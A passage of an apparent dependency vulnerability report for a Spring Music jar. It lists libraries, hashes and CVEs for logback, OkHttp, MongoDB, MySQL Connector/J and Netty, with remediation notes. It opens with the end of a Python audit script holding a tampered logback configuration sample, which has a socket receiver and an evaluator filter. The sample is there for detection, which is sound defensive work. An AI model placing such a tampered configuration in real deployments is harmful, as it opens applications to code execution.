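      </evaluator>
      <onMatch>DENY</onMatch>
      <onMismatch>NEUTRAL</onMismatch>
    </filter>
    <encoder><pattern>%msg%n</pattern></encoder>
  </appender>
  <receiver class="ch.qos.logback.classic.net.server.ServerSocketReceiver">
    <port>4560</port>
  </receiver>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>
"""

if __name__ == "__main__":
    for name, cfg in (("safe", SAFE_CONFIG), ("tampered", TAMPERED_CONFIG)):
        print(name, audit_logback_config(cfg))
```

The DOCTYPE is cut out before the body is parsed, so the audit itself never resolves the external identifier it is looking for. Run it over every logback configuration that reaches the runtime, including any file named by the logback.configurationFile property, and pair the result with a check that the application user cannot write those files, since every entry here assumes that write access.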
CVE-2024-12798 (OSSINDEX)
Arbitrary code execution (ACE) vulnerability in JaninoEventEvaluator by QOS.CH: logback-core versions 0.1 up to and including 1.3.14, and 1.4.0 up to and including 1.5.12, in Java applications allow an attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution.
Malicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension, which compiles the text of an expression element as Java.
A successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege. The fixed releases are 1.3.15 and 1.5.13.
CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CVSSv4:
Base Score: MEDIUM (5.9) Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:ch.qos.logback:logback-core:1.2.3:*:*:*:*:*:*:*
CVE-2024-12801 (OSSINDEX)
Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH: logback versions 0.1 to 1.3.14 and 1.4.0 to 1.5.12 on the Java platform allow an attacker to forge requests by compromising logback configuration files in XML.
The attack involves modifying the DOCTYPE declaration in the XML configuration file so that the SAX parser resolves an external identifier (an external DTD or entity) from an attacker-chosen URL when the configuration is loaded. As with CVE-2024-12798, write access to the configuration is a prerequisite, and the fixed releases are 1.3.15 and 1.5.13.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-12801 for details.
CWE-918 Server-Side Request Forgery (SSRF)
CVSSv4:
Base Score: LOW (2.4) Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:ch.qos.logback:logback-core:1.2.3:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: logging-interceptor-3.3.1.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/logging-interceptor-3.3.1.jar
MD5: 9145e870f51a770ad15221862d11d4f5
SHA1: 99ce730034c6f5aaed710d1e0e9df95e8714ed5f
SHA256: f1c50344a874d5c532b41d09a025acee1e6743b55e007f832d619bc2f552fc3d
Evidence Type Source Name Value Confidence Vendor file name logging-interceptor High Vendor jar package name logging Highest Vendor jar package name logging Low Vendor jar package name okhttp3 Highest Vendor jar package name okhttp3 Low Vendor pom artifactid logging-interceptor Low Vendor pom groupid com.squareup.okhttp3 Highest Vendor pom name OkHttp Logging Interceptor High Vendor pom parent-artifactid parent Low Product file name logging-interceptor High Product jar package name logging Highest Product jar package name logging Low Product jar package name okhttp3 Highest Product pom artifactid logging-interceptor Highest Product pom groupid com.squareup.okhttp3 Highest Product pom name OkHttp Logging Interceptor High Product pom parent-artifactid parent Medium Version file version 3.3.1 High Version pom version 3.3.1 Highest
CVE-2018-20200
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this a vulnerability. Their rationale can be found in https://github.com/square/okhttp/issues/4967. The bypass needs an attacker who can already instrument the running process, and pinning is not designed to resist an attacker with that level of control, which is the basis of the dispute. The artifact flagged here is the logging interceptor; the affected class lives in the core okhttp artifact it depends on, so that artifact's version is the one to check and upgrade.
CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N (exploitability subscore 2.2)
CVSSv2:
Base Score: MEDIUM (4.3) Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-0833
A flaw was found in Red Hat's AMQ Streams, which ships a version of the OkHttp component with an information disclosure flaw: the exception raised for a header containing an illegal value includes that value in its message. This issue could allow an authenticated attacker to access information outside of their regular permissions. The weakness is in OkHttp itself rather than in AMQ Streams, which is why the match applies to this artifact; OkHttp 4.9.2 stopped including header values in those exception messages, so the 3.x line used here is not covered by the fix.
CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N (exploitability subscore 1.8)
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: mail-1.4.7.jar
Description: JavaMail API (compat)
License: http://www.sun.com/cddl, https://glassfish.java.net/public/CDDL+GPL_1_1.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mail-1.4.7.jar
MD5: 77f53ff0c78ba43c4812ecc9f53e20f8
SHA1: 9add058589d5d85adeb625859bf2c5eeaaedf12d
SHA256: 78c33b4f7c7b60f4b680f2d2405b1f063d71929cf1a4fbc328888379f365fcfb
Evidence Type Source Name Value Confidence Vendor file name mail High Vendor jar package name javax Highest Vendor jar package name mail Highest Vendor jar package name provider Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.mail Medium Vendor Manifest extension-name javax.mail Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest originally-created-by 1.7.0_15 (Oracle Corporation) Low Vendor Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Vendor Manifest specification-vendor Oracle Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor Manifest (hint) specification-vendor sun Low Vendor pom artifactid mail Low Vendor pom groupid javax.mail Highest Vendor pom name JavaMail API (compat) High Vendor pom parent-artifactid all Low Vendor pom parent-groupid com.sun.mail Medium Product file name mail High Product jar package name javax Highest Product jar package name mail Highest Product jar package name provider Highest Product jar package name sun Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaMail API (compat) Medium Product Manifest bundle-symbolicname javax.mail Medium Product Manifest extension-name javax.mail Medium Product Manifest Implementation-Title javax.mail High Product Manifest originally-created-by 1.7.0_15 (Oracle Corporation) Low Product Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Product Manifest specification-title JavaMail(TM) API Design Specification Medium Product pom artifactid mail Highest Product pom groupid javax.mail Highest Product pom name JavaMail API (compat) High Product pom parent-artifactid all Medium Product pom parent-groupid com.sun.mail Medium Version file version 1.4.7 High Version Manifest 
Bundle-Version 1.4.7 High Version Manifest Implementation-Version 1.4.7 High Version pom version 1.4.7 Highest
spring-music-sqldb-1.0.jar: micrometer-core-1.0.3.jar
Description: Application monitoring instrumentation facade
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/micrometer-core-1.0.3.jar
MD5: b65e5df7bd88e359261f31785cced9d9
SHA1: 8234fa7ea2b2d6f7147209dcaaa7cd347951d5eb
SHA256: 0fa2584a2dde6a270ca76e7eb9f87d97759f2e8b722a7f8925ab0efe67d58c32
Evidence Type Source Name Value Confidence Vendor central artifactid micrometer-core Highest Vendor central groupid io.micrometer Highest Vendor file name micrometer-core High Vendor jar package name core Low Vendor jar package name io Low Vendor jar package name micrometer Low Vendor Manifest branch 1.0.x Low Vendor Manifest build-date 2018-04-04_16:09:50 Low Vendor Manifest build-host Jons-MBP Low Vendor Manifest build-job LOCAL Low Vendor Manifest build-number LOCAL Low Vendor Manifest built-os Mac OS X Low Vendor Manifest built-status integration Low Vendor Manifest change 3d0f1fd Low Vendor Manifest module-email jschneider@pivotal.io Low Vendor Manifest module-origin micrometer-metrics/micrometer.git Low Vendor Manifest module-owner jschneider@pivotal.io Low Vendor Manifest module-source /micrometer-core Low Vendor pom artifactid micrometer-core Low Vendor pom developer email jschneider@pivotal.io Low Vendor pom developer id jkschneider Medium Vendor pom developer name Jon Schneider Medium Vendor pom groupid io.micrometer Highest Vendor pom name micrometer-core High Vendor pom url micrometer-metrics/micrometer Highest Product central artifactid micrometer-core Highest Product file name micrometer-core High Product jar package name core Highest Product jar package name core Low Product jar package name instrument Low Product jar package name io Highest Product jar package name micrometer Highest Product jar package name micrometer Low Product Manifest branch 1.0.x Low Product Manifest build-date 2018-04-04_16:09:50 Low Product Manifest build-host Jons-MBP Low Product Manifest build-job LOCAL Low Product Manifest build-number LOCAL Low Product Manifest built-os Mac OS X Low Product Manifest built-status integration Low Product Manifest change 3d0f1fd Low Product Manifest Implementation-Title io.micrometer#micrometer-core;1.0.3 High Product Manifest module-email jschneider@pivotal.io Low Product Manifest module-origin micrometer-metrics/micrometer.git Low Product 
Manifest module-owner jschneider@pivotal.io Low Product Manifest module-source /micrometer-core Low Product pom artifactid micrometer-core Highest Product pom developer email jschneider@pivotal.io Low Product pom developer id jkschneider Low Product pom developer name Jon Schneider Low Product pom groupid io.micrometer Highest Product pom name micrometer-core High Product pom url micrometer-metrics/micrometer High Version central version 1.0.3 Highest Version file version 1.0.3 High Version Manifest Implementation-Version 1.0.3 High Version pom version 1.0.3 Highest
spring-music-sqldb-1.0.jar: mongodb-driver-3.6.3.jar
Description: The MongoDB Driver
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mongodb-driver-3.6.3.jar
MD5: 887cd075b7f8fab34bd7462eab23b8d4
SHA1: d462fcc4640ac69b35e7cd2491e992c6bdf82862
SHA256: 05742d826498d5f2223a9919c615a682571c42f99cad85e80429107ccea8c2c7
Evidence Type Source Name Value Confidence Vendor central artifactid mongodb-driver Highest Vendor central groupid org.mongodb Highest Vendor file name mongodb-driver High Vendor jar package name mongodb Low Vendor pom artifactid mongodb-driver Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name MongoDB Driver High Vendor pom url http://www.mongodb.org Highest Product central artifactid mongodb-driver Highest Product file name mongodb-driver High Product pom artifactid mongodb-driver Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name MongoDB Driver High Product pom url http://www.mongodb.org Medium Version central version 3.6.3 Highest Version file version 3.6.3 High Version pom version 3.6.3 Highest
CVE-2021-20328 (OSSINDEX)
Specific versions of the Java driver that support client-side field level encryption (CSFLE) fail to perform correct host name verification on the KMS server's certificate. This vulnerability, in combination with a privileged network position (an active MITM attack), could result in interception of traffic between the Java driver and the KMS service, rendering Field Level Encryption ineffective. This issue was discovered during internal testing and affects all versions of the Java driver that support CSFLE. The Java async, Scala, and reactive streams drivers are not impacted. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services originating from applications residing inside the AWS, GCP, and Azure network fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don't use Field Level Encryption.
Applicability check: the description scopes the flaw to driver releases that support CSFLE, and CSFLE support arrived with the 3.11 line, so the 3.6.3 artifact flagged here carries no CSFLE code path; the match comes from OSS Index's version range rather than from vulnerable code in this jar. Confirm that no field-level encryption is configured, then treat the entry as a suppression candidate and upgrade the driver on its own merits.
CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (6.8) Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.mongodb:mongodb-driver:3.6.3:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: mongodb-driver-core-3.6.3.jar
Description: The Java operations layer for the MongoDB Java Driver. Third parties can wrap this layer to provide custom higher-level APIs
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mongodb-driver-core-3.6.3.jar
MD5: be30b055e73fd7aa5dbab12b8eaee509
SHA1: f2c41ad5349cdb65a6f7bde16f5ebae9a0dbe5f5
SHA256: 7de0b300c3687eeca77d76e6af42ee336880a4b6e08bf33d2bcbaa3c8f98af2f
Evidence Type Source Name Value Confidence Vendor central artifactid mongodb-driver-core Highest Vendor central groupid org.mongodb Highest Vendor file name mongodb-driver-core High Vendor jar package name mongodb Highest Vendor jar package name mongodb Low Vendor Manifest bundle-symbolicname org.mongodb.driver-core Medium Vendor pom artifactid mongodb-driver-core Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name MongoDB Java Driver Core High Vendor pom url http://www.mongodb.org Highest Product central artifactid mongodb-driver-core Highest Product file name mongodb-driver-core High Product jar package name mongodb Highest Product Manifest Bundle-Name mongodb-driver-core Medium Product Manifest bundle-symbolicname org.mongodb.driver-core Medium Product pom artifactid mongodb-driver-core Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name MongoDB Java Driver Core High Product pom url http://www.mongodb.org Medium Version central version 3.6.3 Highest Version file version 3.6.3 High Version Manifest build-version 3.6.3 Medium Version Manifest Bundle-Version 3.6.3 High Version pom version 3.6.3 Highest
spring-music-sqldb-1.0.jar: mssql-jdbc-6.2.2.jre8.jar
Description: Microsoft JDBC Driver for SQL Server. The Azure Key Vault feature in Microsoft JDBC Driver for SQL Server depends on Azure SDK for JAVA and Azure Active Directory Library For Java.
License: MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mssql-jdbc-6.2.2.jre8.jar
MD5: 7422706ded326cc60b222d99e698d437
SHA1: a9ee2b0234f623f49fad888550011035b99d0861
SHA256: 4ff4ff2fc61008a9c51bd16de7150d3d4f18dd628ca5e6b85c03d4e470b1644d
Evidence Type Source Name Value Confidence Vendor file name mssql-jdbc High Vendor jar package name jdbc Highest Vendor jar package name microsoft Highest Vendor jar package name sql Highest Vendor jar package name sqlserver Highest Vendor Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Vendor pom artifactid mssql-jdbc Low Vendor pom developer org Microsoft Medium Vendor pom developer org URL http://www.microsoft.com Medium Vendor pom groupid com.microsoft.sqlserver Highest Vendor pom name Microsoft JDBC Driver for SQL Server High Vendor pom organization name Microsoft Corporation High Vendor pom url Microsoft/mssql-jdbc Highest Product file name mssql-jdbc High Product jar package name jdbc Highest Product jar package name microsoft Highest Product jar package name sql Highest Product jar package name sqlserver Highest Product Manifest Bundle-Name Microsoft JDBC Driver for SQL Server Medium Product Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Product pom artifactid mssql-jdbc Highest Product pom developer org Microsoft Low Product pom developer org URL http://www.microsoft.com Low Product pom groupid com.microsoft.sqlserver Highest Product pom name Microsoft JDBC Driver for SQL Server High Product pom organization name Microsoft Corporation Low Product pom url Microsoft/mssql-jdbc High Version file version 6.2.2.jre8 High Version Manifest Bundle-Version 6.2.2.jre8 High Version pom version 6.2.2.jre8 Highest
spring-music-sqldb-1.0.jar: mysql-connector-java-5.1.46.jar
Description: MySQL JDBC Type 4 driver
License: The GNU General Public License, Version 2: http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mysql-connector-java-5.1.46.jar
MD5: eeacff7cadb9b49e4c3cc6d2f4246088
SHA1: 9a3e63b387e376364211e96827bc27db8d7a92e9
SHA256: 3122089761e6403f02e8a81ed4a2d65a2e1029734651ba00f2ea92d920ff7b1e
Evidence Type Source Name Value Confidence Vendor central artifactid mysql-connector-java Highest Vendor central groupid mysql Highest Vendor file name mysql-connector-java High Vendor jar package name jdbc Highest Vendor jar package name jdbc Low Vendor jar package name mysql Highest Vendor jar package name mysql Low Vendor Manifest bundle-symbolicname com.mysql.jdbc Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.mysql Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid mysql-connector-java Low Vendor pom groupid mysql Highest Vendor pom name MySQL Connector/J High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com Medium Vendor pom url http://dev.mysql.com/doc/connector-j/en/ Highest Product central artifactid mysql-connector-java Highest Product file name mysql-connector-java High Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name jdbc Low Product jar package name mysql Highest Product Manifest Bundle-Name Oracle Corporation's JDBC Driver for MySQL Medium Product Manifest bundle-symbolicname com.mysql.jdbc Medium Product Manifest Implementation-Title MySQL Connector Java High Product Manifest specification-title JDBC Medium Product pom artifactid mysql-connector-java Highest Product pom groupid mysql Highest Product pom name MySQL Connector/J High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com Low Product pom url http://dev.mysql.com/doc/connector-j/en/ Medium Version central version 5.1.46 Highest Version file version 5.1.46 High Version Manifest Bundle-Version 5.1.46 High Version Manifest Implementation-Version 5.1.46 High Version pom version 5.1.46 Highest
CVE-2018-3258 (OSSINDEX)
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:mysql:mysql-connector-java:5.1.46:*:*:*:*:*:*:*
CVE-2023-22102
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.1.0 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
CWE-284 Improper Access Control, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (8.3) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H (exploitability subscore 1.6)
References:
Vulnerable Software & Versions:
CVE-2019-2692
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 8.0.15 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Connectors executes to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).
NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.3) Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H (exploitability subscore 0.3)
CVSSv2:
Base Score: LOW (3.5) Vector: AV:L/AC:H/Au:S/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2022-21363 (OSSINDEX)
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (6.0) Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:mysql:mysql-connector-java:5.1.46:*:*:*:*:*:*:*
CVE-2020-2934
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.19 and prior and 5.1.48 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.0 Base Score 5.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L).
NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.0) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L (exploitability subscore 1.6)
CVSSv2:
Base Score: MEDIUM (5.1) Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2020-2875
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.14 and prior and 5.1.48 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.0 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).
NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N (exploitability subscore 1.6)
CVSSv2:
Base Score: MEDIUM (4.0) Vector: AV:N/AC:H/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2020-2933
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 5.1.48 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.0 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L).
NVD-CWE-noinfo
CVSSv3:
Base Score: LOW (2.2) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L (exploitability subscore 0.7)
CVSSv2:
Base Score: LOW (3.5) Vector: AV:N/AC:M/Au:S/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
Remediation note for this artifact: the three CVE-2020 entries name 5.1.48 and prior, so 5.1.49 closes them within the 5.1 line. The other four entries name only 8.0.x or 8.1.0 releases and reach 5.1.46 through the "and prior" wording or OSS Index's version range. The 5.1 line is end of life, so the practical fix is a move to Connector/J 8.x (8.2.0 or later also closes CVE-2023-22102), which since 8.0.31 is published under the coordinates com.mysql:mysql-connector-j rather than mysql:mysql-connector-java.
spring-music-sqldb-1.0.jar: netty-codec-4.1.23.Final.jar
Description: Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-codec-4.1.23.Final.jar
MD5: d23ad9338741a1d660c68a9d0cac4c6d
SHA1: d6599803bfefbe9a3e226702faade5df0cb678d1
SHA256: c6177cb91f9c065b416530f8ecc495cec3e457652e9bfdc5b21e10effcb23ee2
Evidence Type Source Name Value Confidence Vendor file name netty-codec High Vendor jar package name codec Highest Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.codec Medium Vendor Manifest bundle-docurl http://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.codec Medium Vendor Manifest implementation-url http://netty.io/netty-codec/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor pom artifactid netty-codec Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec High Vendor pom parent-artifactid netty-parent Low Product file name netty-codec High Product jar package name codec Highest Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.codec Medium Product Manifest bundle-docurl http://netty.io/ Low Product Manifest Bundle-Name Netty/Codec Medium Product Manifest bundle-symbolicname io.netty.codec Medium Product Manifest Implementation-Title Netty/Codec High Product Manifest implementation-url http://netty.io/netty-codec/ Low Product pom artifactid netty-codec Highest Product pom groupid io.netty Highest Product pom name Netty/Codec High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.23.Final High Version Manifest Implementation-Version 4.1.23.Final High Version pom version 4.1.23.Final Highest
CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
